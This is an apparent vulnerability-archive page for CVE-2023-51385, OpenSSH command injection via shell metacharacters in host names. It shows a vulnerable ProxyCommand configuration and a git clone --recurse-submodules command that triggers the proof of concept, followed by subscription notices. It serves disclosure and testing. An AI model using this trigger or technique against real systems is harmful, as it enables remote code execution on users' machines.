Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-51385 PoC — OpenSSH 安全漏洞

Source
Associated Vulnerability
Title:OpenSSH 安全漏洞 (CVE-2023-51385)
Description:In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.
Description
OpenSSH ProxyCommand RCE
Readme
# CVE-2023-51385
OpenSSH ProxyCommand RCE

1. When your ProxyCommand is configured as follows:
```
Host *.com
  ProxyCommand /usr/bin/nc -X connect -x 127.0.0.1:7890 %h %p
```
2. Use the following command for proof of concept
```
git clone https://github.com/Le1a/CVE-2023-51385 --recurse-submodules
```

File Snapshot

[4.0K] /data/pocs/6c61f781c5781b1d70879c6a37a395050d827012 ├── [4.0K] POC └── [ 305] README.md 1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →